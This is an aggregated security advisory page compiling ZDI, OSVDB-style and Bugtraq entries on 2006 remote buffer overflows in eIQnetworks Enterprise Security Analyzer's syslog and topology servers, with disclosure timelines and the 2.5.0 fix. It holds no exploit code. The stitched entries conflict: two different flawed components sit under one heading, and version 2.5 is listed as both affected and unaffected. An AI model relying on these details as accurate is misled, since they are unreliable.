A vulnerability exists in the eIQnetworks Enterprise Security Analyzer. The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port.

ZDI-06-023: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer 
Overflow Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-023.html
July 25, 2006

-- CVE ID:
CVE-2006-3838

-- Affected Vendor:
eIQnetworks

-- Affected Products:
eIQnetworks Enterprise Security Analyzer
Astaro Report Manager (OEM)
Fortinet FortiReporter (OEM)
iPolicy Security Reporter (OEM)
SanMina Viking Multi-Log Manager (OEM)
Secure Computing G2 Security Reporter (OEM)
Top Layer Network Security Analyzer (OEM)

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability since  by Digital Vaccine protection
filter ID N/A. For further product information on the TippingPoint IPS:

    http://www.tippingpoint.com 

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of eIQnetworks Enterprise Security Analyzer.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the Syslog daemon, syslogserver.exe,
during the processing of long strings transmitted to the listening TCP
port. The vulnerability is not exposed over UDP. The default
configuration does not expose the open TCP port.

-- Vendor Response:
eIQnetworks has issued an update to correct this vulnerability. More
details can be found at:

    http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf

-- Disclosure Timeline:
2006.05.10 - Vulnerability reported to vendor
 - Digital Vaccine released to TippingPoint customers
2006.07.25 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by Titon, JxT, KF and the rest of 
Bastard Labs.

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, a division of 3Com, The Zero Day Initiative
(ZDI) represents a best-of-breed model for rewarding security
researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
3Com does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, 3Com provides its
customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the
vulnerability are not exposed to any parties until an official vendor
patch is publicly available. Furthermore, with the altruistic aim of
helping to secure a broader user base, 3Com provides this vulnerability
information confidentially to security vendors (including competitors)
who have a vulnerability protection or mitigation product.

    

- Vulnerability Information

27525
eIQnetworks Enterprise Security Analyzer syslogserver.exe Pre-authentication Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Private

- Vulnerability Description

A remote overflow exists in eIQnetworks Enterprise Security Analyzer. The Syslog daemon (syslogserver.exe) fails to perform proper bounds checking on the listening TCP port requests resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary code resulting in a loss of integrity.

- Timeline

2006-07-25 2006-05-10
Unknown Unknown

- Solution

Upgrade to version 2.5.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability Author

- Vulnerability Information

eIQnetworks Enterprise Security Analyzer Topology Server Remote Buffer Overflow Vulnerability
Class: Boundary Condition Error
Bugtraq ID: 19164
Remote: Yes
Local: No
Published: 2006-07-26 12:00:00
Updated: 2008-02-01 08:17:00
Discovered by Cody Pierce.

- Affected Program Versions

Top Layer Network Security Analyzer 0
Secure Computing G2 Security reporter 0
SanMina Viking Multi-Log Manager 0
Fortinet FortiReporter 0
eIQnetworks Enterprise Security Analyzer 2.1
eIQnetworks Enterprise Security Analyzer 2.0
Astaro Report Manager 0
iPolicy Security Reporter 0
eIQnetworks Enterprise Security Analyzer 2.5

- Unaffected Program Versions

iPolicy Security Reporter 0
eIQnetworks Enterprise Security Analyzer 2.5

- Vulnerability Discussion

eIQnetworks Enterprise Security Analyzer Topology Server is prone to a remote buffer-overflow vulnerability.

This issue can facilitate a remote compromise due to arbitrary code execution.

Enterprise Security Analyzer versions prior to 2.5.0 are vulnerable. OEM vendors' versions prior to 4.6 are also vulnerable.

- Exploitation

The following exploit code is available as a module for the Metasploit Framework:

- Solution

The vendor has released version 2.5.0 to address this issue. Please contact the vendor for details.

- References